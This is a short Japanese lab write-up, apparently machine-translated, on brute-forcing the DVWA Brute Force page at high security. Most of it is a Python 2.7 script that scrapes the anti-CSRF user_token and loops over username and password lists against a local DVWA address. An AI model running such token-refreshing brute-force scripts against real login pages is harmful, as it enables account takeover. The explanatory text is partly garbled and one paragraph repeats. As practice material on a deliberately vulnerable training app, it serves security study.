DVWA Brute Force脆弱性利用(Security Level:high)
1906 ワード
Anti-CSSRFtokenを加えて無脳爆破を予防しているので、ここではBurpsuiteはお勧めしませんが、pythonで簡単にスクリプトを書きましょう.
lonehandスクリプト(python 2.7)を借りて、ユーザー名はadminでpasswordパラメータを爆破して結果を印刷しますが、バージョンの問題でuser_を取得します.tokenの場合は相応の調整が必要です.調整結果は以下の通りである:(元の基礎の上でTOKEN取得方式を修正し、ユーザー名の推測を追加した)
lonehandスクリプト(python 2.7)を借りて、ユーザー名はadminでpasswordパラメータを爆破して結果を印刷しますが、バージョンの問題でuser_を取得します.tokenの場合は相応の調整が必要です.調整結果は以下の通りである:(元の基礎の上でTOKEN取得方式を修正し、ユーザー名の推測を追加した)
from bs4 import BeautifulSoup
import urllib2
header={
'Host': '192.168.31.119',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://192.168.31.119/DVWA-master/vulnerabilities/brute/',
'Cookie': 'security=high; PHPSESSID=2afb7fbff91b87660e18dcd0ab1d0ea5',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'}
requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"
def get_token(requrl,header):
req = urllib2.Request(url=requrl,headers=header)
response = urllib2.urlopen(req)
print response.getcode(),
the_page = response.read()
print len(the_page)
soup = BeautifulSoup(the_page,"html.parser")
d = soup.find_all('input', attrs={'name':'user_token'})
user_token = d[0].attrs['value']
return user_token
user_token = get_token(requrl,header)
i=0
for userline in open("user.lst"):
for line in open("pass.lst"):
requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"+"?username="+userline.strip()+"&password="+line.strip()+"&Login=Login&user_token="+user_token
i = i + 1
print i,userline.strip(),line.strip(),
user_token = get_token(requrl,header)